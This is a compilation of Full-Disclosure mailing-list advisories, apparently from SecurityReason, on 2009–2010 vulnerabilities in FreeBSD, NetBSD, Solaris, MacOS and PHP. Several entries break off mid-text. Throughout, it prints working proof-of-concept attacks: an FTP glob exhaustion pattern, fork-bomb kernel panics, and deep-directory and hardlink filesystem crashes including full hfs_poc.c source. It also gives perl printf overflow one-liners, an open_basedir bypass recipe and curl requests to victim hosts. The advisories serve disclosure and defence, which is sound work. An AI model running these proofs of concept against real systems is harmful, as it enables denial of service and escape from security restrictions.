{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*cx
this request will generate 100% usage of process a long time. ftpd come
into glob(3) and will not fast out. Very similar sympthon was described
in vulnerability for glibc strfmon(3)
- - http://securityreason.com/achievement_securityalert/67 --
...
Interesting is that the PHP memory_limit has no control over what will
happens in the level of the libc. Function strfmon(3) can allocate a lot of
data in memory without control by PHP memory_limit.
For example:
php -r 'money_format("%.1343741821i",1);'
will allocate ~1049MB real memory.
memory_limit can be less that 1049M
...
- - http://securityreason.com/achievement_securityalert/67 --
ftpd also dosen't control what will happen in libc.
so it is enough to send
- ---
USER anonymous
PASS
STAT */..[calculated pattern]
- ---
and disconnect to connect again (bypass firewall limits). In php we can
also bypass max_memory_limit by libc vulns.
Attacking machine in this way, we can call the various side effects.
- -kernel panic in netbsd502---
Jul 5 10:18:13 dhclient: DHCPACK from 192.168.92.254
Jul 5 10:18:14 dhclient: bound to 192.168.92.171 -- renewal in 886
seconds.
Jul 5 10:22:43 syslogd: restart
Jul 5 10:22:43 /netbsd: uvm_fault(0xcc2eb35c, 0, 2) -> 0xe
Jul 5 10:22:43 /netbsd: fatal page fault in supervisor mode
Jul 5 10:22:43 /netbsd: trap type 6 code 2 eip c07d9784 cs 8 eflags
10206 cr2 0 ilevel 0
Jul 5 10:22:43 /netbsd: panic: trap
Jul 5 10:22:43 /netbsd: Begin traceback...
Jul 5 10:22:43 /netbsd: End traceba
[Full-disclosure] FreeBSD 8.1/7.3 vm.pmap kernel local race condition
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [ FreeBSD 8.1/7.3 vm.pmap kernel local race condition ] Author: Maksymilian Arciemowicz http://SecurityReason.com http://lu.cxib.net Date: - - Dis.: 09.07.2010 - - Pub.: 07.09.2010 Affected Software (verified): - - FreeBSD 7.3/8.1 Original URL: http://securityreason.com/achievement_securityalert/88 - --- 0.Description --- maxproc This is the maximum number of processes a user may be running. This includes foreground and background processes alike. For obvious reasons, this may not be larger than the system limit specified by the kern.maxproc sysctl(8). Also note that setting this too small may hinder a user's productivity: it is often useful to be logged in multiple times or execute pipelines. Some tasks, such as compiling a large program, also spawn multiple processes (e.g., make(1), cc(1), and other intermediate preprocessors). vm.pmap.shpgperproc - --- 1. FreeBSD 8.1/7.3 kernel local race condition --- Race condition in pmap, allows attackers to denial of service freebsd kernel. Creating a lot of process by fork() (~ kern.maxproc), it's possible to denial kernel. To bypass the MAXPROC from login.conf, we can use a few users to run PoC in this same time, to reach kern.maxproc. suphp can be very usefully. We need choose vector attack. When we have access to few users via ssh, use openssh. Example attack by ssh (POC:http://securityreason.com/achievement_exploitalert/16): 127# ssh c...@0 Password: $ gcc -o poc81 poc81.c $ ./poc81 and in the same time (symetric) 127# ssh m...@0 Password: $ gcc -o poc81 poc81.c $ ./poc81 Result: Jul 29 08:41:29 127 kernel: maxproc limit exceeded by uid 1002, please see tuning(7) and login.conf(5). Jul 29 08:42:01 127 last message repeated 31 times Jul 29 08:44:02 127 last message repeated 119 times Jul 29 08:50:27 127 syslogd: kernel boot file is /boot/kernel/kernel Jul 29 08:50:27 127 kernel: maxproc limit exceeded by uid 0, please see tuning(7) and login.conf(5). Jul 29 08:50:27 127 kernel: panic: get_pv_entry: increase vm.pmap.shpgperproc Jul 29 08:50:27 127 kernel: cpuid = 0 Jul 29 08:50:27 127 kernel: Uptime: 13m23s Jul 29 08:50:27 127 kernel: Cannot dump. Device not defined or unavailable. Jul 29 08:50:27 127 kernel: Automatic reboot in 15 seconds - press a key on the console to abort Jul 29 08:50:27 127 kernel: --> Press a key on the console to reboot, Jul 29 08:50:27 127 kernel: --> or switch off the system now. Jul 29 08:50:27 127 kernel: Rebooting... Jul 29 08:50:27 127 kernel: Copyright (c) 1992-2010 The FreeBSD Project. But when we have php-shell from several uid`s, we can also use suphp. Example attack by suphp: 127# cat cxuser.php 127# ls -la total 16 drwxr-xr-x 2 root wheel 512 Jul 29 08:43 . drwxr-xr-x 4 root wheel 512 Jul 29 08:38 .. - -rw-r--r-- 1 cxcx 27 Jul 29 08:38 cxuser.php - -rwxr-xr-x 1 cxcx 7220 Jul 29 08:38 def - -rw-r--r-- 1 max max 27 Jul 29 08:43 maxuser.php now remote request to cxuser.php and maxuser.php curl http://victim/hack/cxuser.php and in the same time curl http://victim/hack/maxuser.php result: Jul 29 08:43:07 localhost login: ROOT LOGIN (root) ON ttyv0 Jul 29 08:48:30 localhost syslogd: kernel boot file is /boot/kernel/kernel Jul 29 08:48:30 localhost kernel: maxproc limit exceeded by uid 1001, please see tuning(7) and login.conf(5). Jul 29 08:48:30 localhost kernel: panic: get_pv_entry: increase vm.pmap.shpgperproc Jul 29 08:48:30 localhost kernel: cpuid = 0 Jul 29 08:48:30 localhost kernel: Uptime: 4m43s Jul 29 08:48:30 localhost kernel: Jul 29 08:48:30 localhost kernel: Dump failed. Partition too small. Jul 29 08:48:30 localhost kernel: Automatic reboot in 15 seconds - press a key on the console to abort Jul 29 08:48:30 localhost kernel: Rebooting... Jul 29 08:48:30 localhost kernel: Copyright (c) 1992-2010 The FreeBSD Project. - ---debug log - cron (uid=0)--- ... maxproc limit exceeded by uid 1002, please see tuning(7) and login.conf(5). maxproc limit exceeded by uid 1001, please see tuning(7) and login.conf(5). maxproc limit exceeded by uid 1001, please see tuning(7) and login.conf(5). maxproc limit exceeded by uid 1002, please see tuning(7) and login.conf(5). panic: get_pv_entry: increase vm.pmap.shpgperproc cpuid = 0 KDB: enter: panic [ thread pid 7417 tid 106207 ] Stopped at kdb_enter+0x3a: movl $0,kdb_why ... KDB: enter: panic [ thread pid 7417 tid 106207 ] Stopped at kdb_enter+0x3a: movl $0,kdb_why db> ps pid ppid pgrp uid state wmesg wchan cmd 7417 880 880 0 RL CPU 0 cron 7416 880 880 0 RL cron 7415 7413 880 0 RVL cron 7414 7412 7412 0 R sh 7413 880 880 0 D ppwait 0xc8118548 cron 7412 7411 7412 0 Ss wait 0xc8118aa0 sh 7411 880 880 0 S piperd 0xc4d7eab8 cron 7410 5367 1294 1001 RL+ def 7409 5366 1294 1001 RL+ def 7408 5365 1294 1001 RL+ def 7407 5364 1294 1001 RL+ def 7406 5363 1294 1001 RL+ def 7405 5362 1294 1001 RL+ def 7404 5361 1294 1001 RL+ def ... db> trace Tracing
[Full-disclosure] Sun Solaris 10 libc/*convert (*cvt) buffer overflow
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
[ Sun Solaris 10 libc/*convert (*cvt) buffer overflow ]
Author: Maksymilian Arciemowicz
http://SecurityReason.com
Date:
- - Dis.: 15.04.2010
- - Pub.: 21.05.2010
Affected Software:
- - Sun Solaris 10 10/9
Original URL:
http://securityreason.com/achievement_securityalert/86
- --- 0.Description ---
SYNOPSIS
#include
char *econvert(double value, int ndigit, int *decpt, int
*sign, char *buf);
char *fconvert(double value, int ndigit, int *decpt, int
*sign, char *buf);
char *gconvert(double value, int ndigit, int trailing, char
*buf);
char *seconvert(single *value, int ndigit, int *decpt, int
*sign, char *buf);
char *sfconvert(single *value, int ndigit, int *decpt, int
*sign, char *buf);
char *sgconvert(single *value, int ndigit, int trailing,
char *buf);
char *qeconvert(quadruple *value, int ndigit, int *decpt,
int *sign, char *buf);
char *qfconvert(quadruple *value, int ndigit, int *decpt,
int *sign, char *buf);
char *qgconvert(quadruple *value, int ndigit, int trailing,
char *buf);
The econvert() function converts the value to a null-
terminated string of ndigit ASCII digits in buf and returns
a pointer to buf. buf should contain at least ndigit+1 char-
acters. The position of the decimal point relative to the
beginning of the string is stored indirectly through decpt.
Thus buf == "314" and *decpt == 1 corresponds to the numeri-
cal value 3.14, while buf == "314" and *decpt == -1
corresponds to the numerical value .0314. If the sign of the
result is negative, the word pointed to by sign is nonzero;
otherwise it is zero. The least significant digit is
rounded.
SYNOPSIS
#include
char *ecvt(double value, int ndigit, int *restrict decpt,
int *restrict sign);
char *fcvt(double value, int ndigit, int *restrict decpt,
int *restrict sign);
char *gcvt(double value, int ndigit, char *buf);
DESCRIPTION
The ecvt(), fcvt() and gcvt() functions convert floating-
point numbers to null-terminated strings.
- --- 1. Sun Solaris 10 libc/*convert (*cvt) buffer overflow ---
The main problem exists in sun solaris libc. OpenSolaris is not affected.
PoC:
- ---
# cat jaja.c
#include
#include
int main (int argc, char *argv[]){
char number[1];
int a,b;
printf("%s", fconvert((double)0,atoi(argv[1]),&a,&b,number));
return 0;
}
# /usr/local/bin/gcc -o jaja jaja.c
# ./jaja 16
#
# ./jaja 512
#
- ---
for 512 will work fine, because we have used (double)0 to convert. When
we use no zero value, then crash.
ok. let`s set no zero value in jaja2.c
Poc:
- ---
# cat jaja2.c
#include
#include
int main (int argc, char *argv[]){
char number[1];
int a,b;
printf("%s", fconvert((double)1,atoi(argv[1]),&a,&b,number));
return 0;
}
# /usr/local/bin/gcc -o jaja2 jaja2.c
# ./jaja2 512
Segmentation fault (core dumped)
# /usr/local/bin/gdb -q jaja2
(no debugging symbols found)
(gdb) r 512
Starting program: /jaja2 512
(no debugging symbols found)
(no debugging symbols found)
Program received signal SIGSEGV, Segmentation fault.
0xfeeab05c in fconvert () from /lib/libc.so.1
(gdb) i r
eax0x8047240134509120
ecx0x3250 12880
edx0x8048000134512640
ebx0xfef9e000 -17178624
esp0x8044b380x8044b38
ebp0x8044d680x8044d68
esi0x200512
edi0x0 0
eip0xfeeab05c 0xfeeab05c
eflags 0x10206 [ PF IF RF ]
cs 0x3b 59
ss 0x43 67
ds 0x43 67
es 0x43 67
fs 0x0 0
gs 0x1c3451
(gdb) x/x $edx
0x8048000: Cannot access memory at address 0x8048000
(gdb)
- ---
the same result we can get with perl(1)
PoC perl:
- ---
#!/usr/local/bin/perl
printf "%.512f", 1;
# perl pss.pl
Segmentation Fault - core dumped
# /usr/local/bin/gdb -q perl
(no debugging symbols found)
(gdb) r pss.pl
Starting program: /usr/bin/perl pss.pl
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no d
[Full-disclosure] Sun Solaris 10 filesystem rm(1), find(1), etc, Denial-of-service
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
[ Sun Solaris 10 filesystem rm(1),find(1),etc, Denial-of-service ]
Author: Maksymilian Arciemowicz
SecurityReason.com
Date:
- - Dis.: 17.04.2010
- - Pub.: 21.05.2010
Affected Software:
- - Sun Solaris 10 10/09
Original URL:
http://securityreason.com/achievement_securityalert/85
- --- 0.Description ---
Solaris is a Unix operating system introduced by Sun Microsystems in
1992 as the successor to SunOS.
Sun Microsystems, Inc. is a wholly owned subsidiary of Oracle
Corporation, selling computers, computer components, computer software,
and information technology services. Sun was founded on February 24,
1982. The company was headquartered in Santa Clara, California (part of
Silicon Valley), on the former west campus of the Agnews Developmental
Center.
In computing, ZFS is a combined file system and logical volume manager
designed by Sun Microsystems. The features of ZFS include support for
high storage capacities, integration of the concepts of filesystem and
volume management, snapshots and copy-on-write clones, continuous
integrity checking and automatic repair, RAID-Z and native NFSv4 ACLs.
- --- 1. Sun Solaris 10 filesystem rm(1),find(1),etc, Denial-of-service ---
We can create, deep tree and when we will remove, scan or something else
with this tree, affected program will crash with stack overflow sympton
PoC:
# perl -e '$a="X";for(1..8000){ ! -d $a and mkdir $a and chdir $a }'
we need use 1..8000 or bigger value to make stack overflow.
in result
# du X
Segmentation fault (core dumped)
# /usr/local/bin/gdb -q du
(no debugging symbols found)
(gdb) r X
Starting program: /usr/bin/du X
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
Program received signal SIGSEGV, Segmentation fault.
0xfeedfc8a in _ndoprnt () from /lib/libc.so.1
(gdb) x/i $eip
0xfeedfc8a <_ndoprnt+12>: push %ebp
We can simple remove this dir for 1..8000
# rm -rf X
#
but let`s try create this
# perl -e '$a="Y";for(1..5){ ! -d $a and mkdir $a and chdir $a }'
# rm -rf Y
Segmentation fault (core dumped)
rm(1) has fail!
what is wrong? stack overflow
# /usr/local/bin/gdb -q rm
(no debugging symbols found)
(gdb) r -rf Y
Starting program: /usr/bin/rm -rf Y
(no debugging symbols found)
(no debugging symbols found)
Program received signal SIGSEGV, Segmentation fault.
0x08051c03 in ?? ()
(gdb) x/i $eip
0x8051c03: push %ebx
# find Y CX >> /dev/null
Segmentation fault (core dumped)
find(1) also fails!
# /usr/local/bin/gdb -q find
(no debugging symbols found)
(gdb) r Y CX >> /dev/null
Starting program: /usr/bin/find Y CX >> /dev/null
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
Program received signal SIGSEGV, Segmentation fault.
0xfeecfc8a in _ndoprnt () from /lib/libc.so.1
(gdb) x/i $eip
0xfeecfc8a <_ndoprnt+12>: push %ebp
- --- 2. Fix ---
Sun Solaris will fix this issue.
- --- 3. Greets ---
sp3x Infospec pi3
- --- 4. Contact ---
Author: SecurityReason.com [ Maksymilian Arciemowicz ]
Email:
- - cxib {a\./t] securityreason [d=t} com
GPG:
- - http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
http://securityreason.com/
http://securityreason.com/exploit_alert/ - Exploit Database
http://securityreason.com/security_alert/ - Vulnerability Database
-BEGIN PGP SIGNATURE-
iEYEARECAAYFAkv2fyAACgkQpiCeOKaYa9ZQAwCfUrpH2glAhxCZVwpvOTKp8F38
ssYAoMKcw4CX0hjK2CsCEkIAVyO5OB6e
=dQfV
-END PGP SIGNATURE-
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Sun Solaris 10 ftpd Cross-site request forgery
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [ Sun Solaris 10 ftpd Cross-site request forgery ] Author: Maksymilian Arciemowicz SecurityReason.com Date: - - Dis.: 24.02.2010 - - Pub.: 21.05.2010 Affected Software: - - Sun Solaris 10 10/09 - - OpenSoalris 2009.06 Original URL: http://securityreason.com/achievement_securityalert/84 - --- 0.Description --- in.ftpd is the Internet File Transfer Protocol (FTP) server process. The server may be invoked by the Internet daemon inetd(1M) each time a connection to the FTP service is made or run as a standalone server. CWE-352: When a web server is designed to receive a request from a client without any mechanism for verifying that it was intentionally sent, then it might be possible for an attacker to trick a client into making an unintentional request to the web server which will be treated as an authentic request. This can be done via a URL, image load, XMLHttpRequest, etc. and can result in data disclosure or unintended code execution. - --- 1. Sun Solaris 10 ftpd Cross-site request forgery --- The main problem exists in dividing long command for few others. The problem stems from the fact the use of the loop for(;;) and function fgets(). etc Example: ftp://ftp.sun.com // /stat or ftp://ftp.sun.com
[Full-disclosure] MacOS X 10.6.3 filesystem hfs Denial of Service Vulnerability
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
[ MacOS X 10.6.3 filesystem hfs Denial of Service Vulnerability ]
Author: Maksymilian Arciemowicz
http://SecurityReason.com
Date:
- - Dis.: 01.04.2010
- - Pub.: 23.04.2010
CVE: CVE-2010-0105
Risk: Medium
Affected Software:
- - MacOS 10.6 (tested on 1062 and 1063)
NOTE: Prior versions may also be affected.
Orginal URL:
http://securityreason.com/achievement_securityalert/83
- --- 0.Description ---
Mac OS is the trademarked name for a series of graphical user
interface-based operating systems developed by Apple Inc. (formerly
Apple Computer, Inc.) for their Macintosh line of computer systems. The
Macintosh user experience is credited with popularizing the graphical
user interface. The original form of what Apple would later name the
"Mac OS" was the integral and unnamed system software first introduced
in 1984 with the original Macintosh, usually referred to simply as the
System software.
- --- 1. MacOS X 10.6.3 filesystem hfs Denial of Service ---
The main problem exist in implementation of filesystem (hfs). MacOS X
10.6.3 has default hfs filesystem, so the problem came, when we create a
special structure with hardlinks.
Interesting information is in wikipedia :
http://en.wikipedia.org/wiki/Hard_link
- ---
...
Most modern operating systems don't allow hard links on directories to
prevent endless recursion. A notable exception to this is Mac OS X v10.5
(Leopard) which uses hard links on directories for the Time Machine
backup mechanism only.
...
- ---
In 10.6 we can't use ln(1) command to create hardlink to directory
(example: # ln C/C CX ). Anyway, we can use link(3) function and we
don't need any special privileges! It hear nice to exploit it.. let's try
To show this issue, we need use this program:
( http://securityreason.com/achievement_exploitalert/15 )
- --- hfs_poc.c ---
/* Proof of Concept for CVE-2010-0105
MacOS X 10.6 hfs file system attack (Denial of Service)
by Maksymilian Arciemowicz from SecurityReason.com
http://securityreason.com/achievement_exploitalert/15
NOTE:
This DoS will be localized in phase
Checking multi-linked directories
So we need activate it with line
connlink("C/C","CX");
Now we need create PATH_MAX/2 directory tree to make overflow.
and we should get diskutil and fsck_hfs exit with sig=8
~ x$ diskutil verifyVolume /Volumes/max2
Started filesystem verification on disk0s3 max2
Performing live verification
Checking Journaled HFS Plus volume
Checking extents overflow file
Checking catalog file
Checking multi-linked files
Checking catalog hierarchy
Checking extended attributes file
Checking multi-linked directories
Maximum nesting of folders and directory hard links reached
The volume max2 could not be verified completely
Error: -9957: Filesystem verify or repair failed
Underlying error: 8: POSIX reports: Exec format error
*/
#include
#include
#include
#include
#include
#include
#include
int createdir(char *name){
if(0!=mkdir(name,((S_IRWXU | S_IRWXG | S_IRWXO) & ~umask(0))| S_IWUSR
|S_IXUSR)){
printf("Can`t create %s", name);
exit(1);}
else
return 0;
}
int comein(char *name){
if(0!=chdir(name)){
printf("Can`t chdir in to %s", name);
exit(1);}
else
return 0;
}
int connlink(a,b)
char *a,*b;
{
if(0!=link(a,b)){
printf("Can`t create link %s => %s",a,b);
exit(1);}
else
return 0;
}
int main(int argc,char *argv[]){
int level;
FILE *fp;
if(argc==2) {
level=atoi(argv[1]);
}else{
level=512; //default
}
createdir("C"); //create hardlink
createdir("C/C"); //create hardlink
connlink("C/C","CX"); //we need use to checking multi-linked directorie
comein("C");
while(level--)
printf("Level: %i mkdir:%i chdir:%i\n",level,
createdir("C"),
comein("C"));
printf("check diskutil verifyVolume /\n");
return 0;
}
- --- hfs_poc.c ---
or use
- --- last.c ---
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
/* function mkpath() from mkdir(1)/netbsd
* Copyright for mkdir.c (c) 1983, 1992, 1993
* The Regents of the University of Califo
Re: [Full-disclosure] PHP 5.2.12/5.3.1 session.save_path safe_mode and open_basedir bypass
Christian Sciberras wrote: > What exactly are the implications of this? > Surely no one [website] accepts paths. > safe_mode and open_basedir usually use small providers. Of course, this is idiotic use safe_mode and open_basedir when we can bypass it via symlinks. -- Best Regards, pub 1024D/A6986BD6 2008-08-22 uid Maksymilian Arciemowicz (cxib) sub 4096g/0889FA9A 2008-08-22 http://securityreason.com http://securityreason.com/key/Arciemowicz.Maksymilian.gpg signature.asc Description: OpenPGP digital signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] PHP 5.2.12/5.3.1 session.save_path safe_mode and open_basedir bypass
[ PHP 5.2.12/5.3.1 session.save_path safe_mode and open_basedir bypass ]
Credit: Grzegorz Stachowiak
Provided by: SecurityReason.com
Date:
- Written: 31.01.2010
- Public: 11.02.2010
SecurityRisk: Medium
Affected Software:
PHP 5.2.12
PHP 5.3.1
Advisory URL: http://securityreason.com/achievement_securityalert/82
Vendor: http://www.php.net
--- 0.Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is
borrowed from C, Java and Perl with a couple of unique PHP-specific
features thrown in. The goal of the language is to allow web developers
to write dynamically generated pages quickly.
A visitor accessing your web site is assigned a unique id, the so-called
session id. This is either stored in a cookie on the user side or is
propagated in the URL.
session.save_path defines the argument which is passed to the save
handler. If you choose the default files handler, this is the path where
the files are created. Defaults to /tmp. See also session_save_path().
There is an optional N argument to this directive that determines the
number of directory levels your session files will be spread around in.
For example, setting to '5;/tmp' may end up creating a session file and
location like /tmp/4/b/1/e/3/sess_4b1e384ad74619bd212e236e52a5a174If .
In order to use N you must create all of these directories before use. A
small shell script exists in ext/session to do this, it's called
mod_files.sh. Also note that if N is used and greater than 0 then
automatic garbage collection will not be performed, see a copy of
php.ini for further information. Also, if you use N, be sure to surround
session.save_path in "quotes" because the separator (;) is also used for
comments in php.ini.
1. session.save_path safe mode and open basedir bypass ---
session.save_path can be set via ini_set(), session_save_path()
functions. In session.save_path there should be path where you will save
yours tmp files. But syntax for session.save_path is:
[/PATH]
OR
[N;/PATH]
N - can be also a string (N should be numeric).
EXAMPLES:
1. session_save_path("/DIR/WHERE/YOU/HAVE/ACCESS")
2. session_save_path("5;/DIR/WHERE/YOU/HAVE/ACCESS")
The main problem came when we use multiple ';' character and when we
will create fake directory structure to reduce '../'.
Proof of Concept:
0. Create directories:
/humhum
and
/byp
1. set open_basedir = /byp
2. create test.php
{
session_save_path("/humhum");
session_start();
}
3. php test.php
Warning: session_save_path(): open_basedir restriction in effect.
File(/humhum) is not within the allowed path(s): (/byp) in /byp/test.php
on line 3
4. subdir.php
{
mkdir("puf");
mkdir(";a");
}
5. php subdir.php
6. cd puf
7. create byp.php
{
session_save_path(";;/byp/;a/../../humhum");
session_start();
}
8. php byp.php
9. ls /humhum
sess_d905eb71c9ad65ce2a845cdb0fed3016
The main problem is located in session.c. PHP doesn't check, that we
have used next ';' after first. Creating fake directory structure
mkdir ';a'
mkdir '../;a'
we can reduce directory level using '../' .
--- 2. Fix ---
Revision 294272
http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/session/session.c?view=log
http://svn.php.net/viewvc/php/php-src/branches/PHP_5_2/ext/session/session.c?view=log
--- 3. Credit ---
Founded by: Grzegorz Stachowiak
Written by: Maksymilian Arciemowicz
Fixed by : Ilia Alshanetsky
--- 4. Contact ---
Email:
- Grzegorz.Stachowiak
stachowiak [a,t} analogicode (d_0t} pl
- Maksymilian Arciemowicz
cxib {a.t] securityreason [d0_t} com
GPG:
http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
http://securityreason.com/
http://securityreason.com/exploit_alert/ - Exploit Database
http://securityreason.com/security_alert/ - Vulnerability Database
signature.asc
Description: OpenPGP digital signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] MacOS X 10.5/10.6 libc/strtod(3) buffer overflow
I have not checked this issue in macos 10.4. In MacOS 10.1 does not work. But the perl script (in macos 10.5) Chujwamwmuzg.pl --- #!/usr/local/bin/perl printf "% 0.4194310f, 0x0.0x41414141; Chujwamwmuzg.pl --- will crash with esi = 0x41414141 edi = 0x15 Other bugs in libc also work on new versions of macos. Example overflow in FTSENT structure http://securityreason.com/achievement_securityalert/60 http://securityreason.com/achievement_securityalert/68 We confirmed this issue in MacOS 10.1. > Joshua Levitsky wrote: > and it then rebooted my mac :) > > On Mon, Jan 11, 2010 at 1:57 PM, Joshua Levitsky <mailto:jlevi...@joshie.com>> wrote: > > The below hosed my terminal session on 10.4.11... I did this in a > >console login so don't have the results.. You need? or is dropping > me to a blue screen and lack of system response good? > > #!/usr/local/bin/perl > printf "%0.4194310f", 0x0.0x41414141; > > > Perl will crash with > esi = 0x41414141 > edi = 0x15 > > -Josh -- Best Regards, -------- pub 1024D/A6986BD6 2008-08-22 uid Maksymilian Arciemowicz (cxib) sub 4096g/0889FA9A 2008-08-22 http://securityreason.com http://securityreason.com/key/Arciemowicz.Maksymilian.gpg signature.asc Description: OpenPGP digital signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] MacOS X 10.5/10.6 libc/strtod(3) buffer overflow
Joshua Levitsky wrote: > On Thu, Jan 7, 2010 at 7:20 PM, Maksymilian Arciemowicz > mailto:c...@securityreason.com>> wrote: > > [ MacOS X 10.5/10.6 libc/strtod(3) buffer overflow ] > > Author: Maksymilian Arciemowicz and sp3x > http://SecurityReason.com > > CVE: CVE-2009-0689 > CWE: CWE-119 > Risk: High > Remote: Yes > > > I tested doing "printf %1.262159f 1.1" in a shell login on 10.4.11 and > it took out my session. I imagine this means 10.4.11 is vulnerable as > well no? Tiger is still very popular in enterprise environments that are > slow to upgrade. > > -- > Joshua Levitsky, MCSE, CISSP > http://www.jnuxhosting.net > http://www.jnux.net > http://blog.joshie.com/ > [5957 F27C 9C71 E9A7 274A 0447 C9B9 75A4 9B41 D4D1] > Could you check perl PoC ? It should overwrite esi and edi register esi=0x41414141 edi=15 -- Best Regards, ---- pub 1024D/A6986BD6 2008-08-22 uid Maksymilian Arciemowicz (cxib) sub 4096g/0889FA9A 2008-08-22 http://securityreason.com http://securityreason.com/key/Arciemowicz.Maksymilian.gpg signature.asc Description: OpenPGP digital signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] MacOS X 10.5/10.6 libc/strtod(3) buffer overflow
[ MacOS X 10.5/10.6 libc/strtod(3) buffer overflow ]
Author: Maksymilian Arciemowicz and sp3x
http://SecurityReason.com
Date:
- Dis.: 07.05.2009
- Pub.: 08.01.2010
CVE: CVE-2009-0689
CWE: CWE-119
Risk: High
Remote: Yes
Affected Software:
- MacOS 10.6
NOTE: Prior versions may also be affected.
Original URL:
http://securityreason.com/achievement_securityalert/81
--- 0.Description ---
Mac OS is the trademarked name for a series of graphical user
interface-based operating systems developed by Apple Inc. (formerly
Apple Computer, Inc.) for their Macintosh line of computer systems. The
Macintosh user experience is credited with popularizing the graphical
user interface. The original form of what Apple would later name the
"Mac OS" was the integral and unnamed system software first introduced
in 1984 with the original Macintosh, usually referred to simply as the
System software.
--- 1. MacOS X 10.5/10.6 libc/strtod(3) buffer overflow ---
The main problem exist in dtoa implementation. MacOS X has the same dtoa
as OpenBSD, NetBSD etc. This problem affects not only libc/gdtoa.
Affected is also strtod(3) function.
For more information, please see SREASONRES:20090625.
http://securityreason.com/achievement_securityalert/63
but fix for SREASONRES:20090625, used by openbsd was not good.
More information about fix for openbsd and similars SREASONRES:20091030,
http://securityreason.com/achievement_securityalert/69
We can create any number of float, which will overwrite the memory. In
Kmax has defined 15. Functions in dtoa, don't checks Kmax limit, and
it is possible to call 16<= elements of freelist array.
It is true that the examples presented in the previous notes, using the
printf (1) do not work under MacOS X. This does not mean the MacOSX C
library is safe.
More:
http://cwe.mitre.org/data/definitions/119.html
--- 2. Proof of Concept (PoC) ---
--- 2.1. strtod(3) buffer overflow example PoC ---
#include
#include
int main ()
{
char number[] = "0.11...11", *e;
double weed = strtod(number, &e);
printf("grams = %lf\n", weed);
return 0;
}
(gdb) r
Starting program: /Volumes/ARC/299
Reading symbols for shared libraries ++. done
Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_PROTECTION_FAILURE at address: 0x0039f000
0x002271ac in __diff_D2A ()
(gdb) i r
eax0xc71c71c7 -954437177
ecx0xacb44 707396
edx0x0 0
ebx0x2c2e4f 2895439
esp0xbffb65d0 0xbffb65d0
ebp0xbffb6618 0xbffb6618
esi0x39f000 3796992
edi0x0 0
eip0x2271ac 0x2271ac <__diff_D2A+246>
eflags 0x10246 66118
cs 0x17 23
ss 0x1f 31
ds 0x1f 31
es 0x1f 31
fs 0x0 0
gs 0x37 55
edi=0x0
eax=0xc71c71c7
eip=0x002271ac
(gdb) x/i 0x002271ac
0x2271ac <__diff_D2A+246>: mov%eax,(%esi)
--- 2.2. atof(3) buffer overflow example PoC ---
#include
#include
int
main()
{
char s[]="111.11...11";
float a=atof(s);
printf("%f",a);
}
x$ ls -la m0.c
-rwxrwxrwx@ 1 x staff 317507 Jan 3 14:23 m0.c
x$ gcc -o m0 m0.c
x$ ./m0
Bus error
Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_PROTECTION_FAILURE at address: 0x0039f000
0x00227017 in __lshift_D2A ()
(gdb) x/i 0x00227017
0x227017 <__lshift_D2A+68>: movl $0x0,(%edx)
(gdb) i r
eax0x16bc 5820
ecx0x80b6 32950
edx0x39f000 3796992
ebx0x2c2e4f 2895439
esp0xbffb2070 0xbffb2070
ebp0xbffb20b8 0xbffb20b8
esi0x26bd 9917
edi0x80b7 32951
eip0x227017 0x227017 <__lshift_D2A+68>
eflags 0x10203 66051
cs 0x17 23
ss 0x1f 31
ds 0x1f 31
es 0x1f 31
fs 0x0 0
gs 0x37 55
(gdb) bt
#0 0x00227017 in __lshift_D2A ()
#1 0x002c3b74 in strtod_l$UNIX2003 ()
#2 0x00275ba7 in atof ()
#3 0x17eb in main ()
--- 3. SecurityReason Note ---
Officialy SREASONRES:20090625 has been detected in:
- OpenBSD
- NetBSD
- FreeBSD
- MacOSX
- Google Chrome
- Mozilla Firefox
- Mozilla Seamonkey
- Mozilla Thunderbird
- Mozilla Sunbird
- Mozilla Camino
- KDE (example: konqueror)
- Opera
- K-Meleon
- F-Lock
- MatLab
- J
This list is not yet closed.
FreeBSD project has fixed this issue (state 2010-01-05) only in
MAIN
RELENG_8_0_BP
RELENG_8_0_0_RELEASE
RELENG_8_0
RELENG_7
RELENG_6
Please note that the issue can also exist in Sony PlayStation 3.
The license of PS3 :
http://www.scei.co.jp/ps3-license/see.html
---
The separate 'dtoa.c' file is separately licenced, thus:
Copyright. 1991, 2000 by Lucent Technologies.
---
MacOS gdtoa have also "Lucent
[Full-disclosure] Matlab R2009b Array Overrun (code execution)
